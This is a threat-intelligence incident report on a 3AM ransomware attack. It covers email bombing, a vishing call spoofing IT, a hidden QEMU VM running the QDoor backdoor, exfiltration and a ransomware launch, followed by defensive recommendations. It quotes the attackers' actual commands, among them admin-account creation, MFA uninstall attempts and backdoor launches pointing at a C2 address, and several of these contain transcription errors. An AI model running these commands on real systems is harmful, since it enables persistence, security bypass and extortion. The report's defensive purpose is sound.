Ransomware is usually a crime of opportunity. Attackers typically strike through an easily-discovered vulnerability or security weakness— unpatched Internet-facing software, vulnerable network edge devices or exposed inbound virtual private network ports lacking multifactor authentication are among the most common points of initial compromise. However, some attacks appear much more targeted and include significant pre-attack reconnaissance and identification of specific organization employees as targets.
Sophos has been tracking multiple ransomware actors leveraging an attack pattern first reported by Microsoft in May 2024 in connection with the threat group designated Storm-1811: using “email bombing” to overload a targeted organization’s employee with unwanted emails, and then making a voice or video call over Microsoft Teams posing as a tech support team member to deceive that employee into allowing remote access to their computer. Between November 2024 and mid-January 2025, Sophos documented two distinct threat clusters using these techniques in over 15 incidents. Further hunting has found over 55 attempted attacks using this technique.
in the first quarter of 2025, Sophos Incident Response aided an organization targeted by attackers affiliated with the 3AM ransomware group. The pattern followed other email bombing attacks in many ways. But there were many aspects of the attack that made it stand apart from previous Teams “vishing” incidents connected to the two threat clusters Sophos had previously associated with these tactics.
In this case, the attacker used a phone call that spoofed the phone number of organization’s IT department. The attack included deployment of a virtual machine to a compromised computer, providing the attackers with an initial foothold hidden from the view of endpoint protection software. The ransomware attack itself was thwarted, but the attackers were able to stay on the network for 9 days before attempting to launch ransomware. They succeeded in stealing data from the targeted organization’s network.
Before the attack, the 3AM actors performed reconnaissance of the organization, gathering information about the organization. This included email addresses associated with company employees, and the phone number of the organization’s internal IT department. They used this information to tailor their attack.
3AM Ransomware
First reported by Symantec in September 2023, 3AM has been assessed by researchers at Intrinsic and other organizations s to be a rebranding of BlackSuit / Royal ransomware, and connected to one of the core “teams” of the disbanded Conti group. Mentioned in the BlackBasta ransomware chat log leaks, 3AM has ties to the BlackBasta-affiliated actors involved in the Microsoft Teams-based vishing Sophos MDR tracks as STAC5777.
The voice phising techniques used by 3AM actors in this case and in STAC5777 cases were discussed in the BlackBasta leaks. A full script for vishing phone operators was posted in the chat in May of 2024, and research began into using vishing in the fall of 2023 when the actors began purchasing Microsoft Teams accounts. Around that time, the BlackBasta threat actors tested out an open source tool called “TeamsPhisher.”
Day 1 and 2
Initial compromise and deployment of backdoor
The attack commenced with email bombing. Employee email addresses obtained during reconnaissance were used to subscribe to multiple email lists. On day one of the attack, the primary targeted employee received 24 unsolicited emails within a 3-minute period.
As the emails began to arrive, the threat actor called the employee’s telephone via voice-over-IP , spoofing the phone number of the company’s IT department. Using the emails as a pretext, the threat actor socially-engineered the employee to grant them remote access to their computer using Microsoft Quick Assist.
Microsoft Quick Assist has the benefit of being installed by default on Windows 10 (version 1607 and later) and Windows 11 systems—though in recent updates Microsoft moved Quick Assist to the Microsoft Store, requiring updates or reinstalls from the Store to activate it. If installed, it can be launched from a keyboard shortcut (Ctrl+Windows Key+Q).
The employee was convinced by the fake call and provided the attacker access via Quick Assist. The threat actor used the already running session of Chrome to open a new tab and navigate to a recently created domain that spoofed one tied to Microsoft and Quick Assist (msquick[.]link). The site redirected to a one-time text message service (1ty[.]me), which was used to pass a URL to a Google Drive folder containing an archive named UpdatePackage_excic.zip. This archive was extracted into the directory \ProgramData\UpdatePackage_exic\.
Defense evasion and initial command and control
In the payload were a VBS script (Update.vbs), a Qemu emulator binary, and a virtual disk.
The threat actor launched the VBS script from the command prompt which launched a Windows 7 virtual machine within the Qemu emulator, connecting it to the targeted system’s network interface (MITRE ATT&CK method T1610-Deploy Container):
“C:\ProgramData\UpdatePackage_excic\wexe” -m 4096 – hda Update_excic.acow2 – netdev user,id=myneto -device e1000,netdev=mynetO – cpu max – display none
A QDoor trojan was pre-installed on the Windows 7 virtual machine. QDoor, first reported by ConnectWise in September 2024, is a network tunneling backdoor that uses the Qt networking libraries. It connected through the Qemu client’s binding to the targeted device’s network adapter to a hardcoded IP address (88.118.167[.]239:443). This address was documented both in the Blacksuit ransomware case reported by ConnectWise and in a Lynx ransomware attack that leveraged QDoor observed by Sophos Managed Detection and Response. The address is associated with an Internet service provider in Lithuania.
This backdoor allowed the threat actor to establish a foothold on the targeted organization’s network while evading detection by Sophos XDR endpoint software. Qemu did not require installation, so no administrative privileges were required for deployment. snd application control for virtual machines was not enabled.
At this point, the Microsoft Quick Assist session was terminated, as the threat actor had established direct communication and control.
Discovery, lateral movement and persistence
Using tools within the QEMU virtual machine, the attacker compromised a domain services account. Five hours after the initial compromise, the threat actor used that account and the Windows Management Instrumentation Command-line utility (WMIC) to execute PowerShell on one of the organization’s servers.
Leveraging PowerShell, the threat actor ran the following commands to see which accounts had active user sessions on the server, create a new account on that system and add the account to the local Administrators group:
exe net1 localgroup administrators net1 localgoup Administrators [targeted organization name] SupportUser /add net1 user [targeted organization name] SupportUser Gr@@@ndbabis11 /add net1 localgroup Administrators [targeted organization name] SupportUser /add
The threat actor then pivoted to use the newly created account to establish a Remote Desktop session on the server via the created local administrator account. To establish additional external access, the attacker installed a commercial remote machine management (RMM) tool, XEOXRemote, which leverages XEOX’s cloud portal.
In the time following this activity, a domain administrator account was also compromised. Unfortunately, no forensic artifacts were available to explain how that compromise occurred. As domain administrator, the attacker executed the following discovery commands on the compromised server:
C: \Windows\system32\control.exe netconnections ipconfig /all C: \Windows \system32\netl sessions net group "domain Admins" /domain wmic product get name, version exe quser /server:[internal ip address] quser /server:[internal ip address] quser nitest / DOMAIN_TRUSTS nltest /dclist: whoami /all
The attacker also used the “ping” command to test connectivity to a number of hosts on the network. Over the remainder of the incident, the attacker would use the compromised domain administrator account to move laterally to nine other hosts on the network and performed similar discovery commands on those systems. The results of those commands were saved in several files ( pc.txt, dir.txt, and a1.txt). Pc.txt contained a list of internal ip addresses.__Multiple other hosts had a C[:]\ProgramData\d.bat file dropped on them which would enable RDP in the registry and open a firewall
Early on the second day, the attacker abandoned the initial foothold and shutdown the QEMU emulator. All following activity was through Remote Desktop for interactive sessions, and through XEOX and WMIC for remote execution of commands and binaries.
Day 3
(Failed) defense evasion
The targeted organization had previously installed Sophos XDR endpoint protection across all devices except for one server. Multifactor authentication was implemented for RDP access for all user accounts. These measures frustrated further efforts by the threat actor to move laterally.
MFA prevented the threat actor from establishing interactive sessions over RDP. However, it did not protect against the continued use of WMIC and remote PowerShell activity.
The attacker attempted to uninstall MFA three different ways, which were all unsuccessful:
Via a WMIC command
wmic product where "name=Duo Authentication for Windows Logon x64" call uninstall /nointeractive
Via a WMIC command nested within a Scheduled Task designed to run under the system context:
SCHTASKS /s [internal IP address]/RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c wmic product where name="Duo Authentication for Windows Logon x64" call uninstall /nointeractive" /sc ONCE /sd 01/01/2025 /st 00:00
This task name is one used in a Conti playbook leaked by a disgruntled Conti affiliate in 2021. It could easily be changed at no cost to the threat actors, but yet it is still being used by former Conti affiliates four years later.
Via an MsiExec command to uninstall MFA based on the Product ID:
- msiexec /X [Duo Product ID] /gn /norestart
The attacker additionally made efforts to disable Sophos endpoint protection on two servers by attempting to deploy EDR Sandblaster (an “EDR killer”). This was also unsuccessful.
Exfiltration
On two hosts, the threat actor installed a legitimate cloud synchronization tool called GoodSync, which is compatible with Microsoft, Google, Amazon, Dropbox, and other services. They then used GoodSync to upload approximately 868 GB of data from those servers to the cloud storage provider Backblaze.
Day 5
Blocked backdoor deployment
The attacker accessed another server and remotely installed a remote access tool called Syncro Live Agent (now branded as Synchro XMM), which evidence suggests was never used by the threat actor They also deployed two copies of the QDoor remote access trojan onto the disk, named vol.exe and svchost.exe to disguise them, via WMIC commands:
- wmic / node:"[hostname]" process call create "cmd /c C:\ProgramData\vol.exe 172.86.121[.]134 - wmic /node:[local IP address]process call create "cmd /c C:\ProgramData\svchost.exe "172.86.121[.]134"
Both vol.exe and svchost.exe were copies of the same malicious binary already identified, detected and prevented from executing by Sophos as QDoor malware.
Day 9
Failed lateral movement
The attackers continued to try to gain access to additional systems through RDP. but were blocked repeatedly by MFA controls. Eventually, they found an unmanaged device—the one server with no endpoint protection— and leveraged it to launch a remote 3AM ransomware attack against the network.
(Limited) Impact
The threat actor deployed the ransomware binary as C:\L.exe on the unmanaged device, as well as a batch file (1.bat) containing commands to target 88 computers on the network. The batch file attempted to map to the C drive of each of the identified hosts. Example command taken from 1.bat:
- start 1l L.exe -k [ransomware portal access key] -s 10 -m net -p \ \[host IP address]\c$
Sophos endpoint’s CryptoGuard feature prevented remote encryption on the systems that had Sophos protection installed, identifying the remote activity as ransomware. The impact of the ransomware was mostly limited to the unmanaged host the ransomware was executed from.
Conclusions
Defenders should take the following steps to prevent or mitigate the results of these threat actor techniques, tools and procedures:
Build employee awareness
Vishing attacks, such as this 3AM incident and other recent ransomware actor attacks, depend upon deception and leveraging of a targeted individual’s confusion and sense of urgency driven by events they don’t expect—such as an onslaught of unwanted emails suddenly disrupting their workday. Educate staff on the exact ways IT support will contact them, under what circumstances, and which tools they will use to provide remote technical support so they can recognize social engineering efforts more easily.
Audit administrative and service accounts
Enforce complexity of passwords, limit access by policy to prevent misuse if compromised, and ensure there is no password reuse across administrative accounts. Regularly audit administrative accounts and disable local administrator accounts. Follow Microsoft’s guidelines for least-privilege administrative models. Additionally, if service accounts cannot have multifactor authentication enabled for specific technical reasons, they should be restricted to specific log-on times and have their privileges limited to only those required for their tasks.
Deploy policy-driven application control for software and scripts
Extended detection and response (XDR) protection tools, such as those provided by Sophos allow for policy-driven blocking of legitimate executables that are unwanted within an organization’s IT estate. Identify which software tools are in legitimate use within your organization and block those which are not expected. Execution of products (including QEMU and other virtual machines, remote machine management software and remote control software) can be restricted to specific users or devices. Also restrict the use of PowerShell through execution policies to specific administrative accounts. Prevent untrusted code from executing through digital signature verification and set PowerShell execution policy to only execute signed scripts.
Implement MFA for and place strict controls on remote access
Use of an MFA product helped restrict lateral movement and remote access in this case; organizations should do all they can to strengthen authentication for remote access, and to limit which systems can be accessed from outside the network through policies and network segmentation.
Use network filtering and network intrusion prevention to block unwanted remote access
Block access to ports associated with remote access to critical segments of the network, restricting remote desktop access to servers specifically designated for that task. Use IPS filters to block inbound and outbound network traffic that could be connected to remote control, backdoors and data exfiltration. Create detections and alerts that are triggered by this type of activity.
Lock down Windows Registry editing
Restrict who can modify hives or keys in Windows registry related to settings that can impact or be used to bypass security software and polices.
Indicators of compromise from this attack will be posted to the Sophos GitHub.
Acknowledgements
Sophos X-Ops thanks Nathan Mante, Harinder Bhathal and Michael Warner of Sophos Incident Response for their contributions to this report.
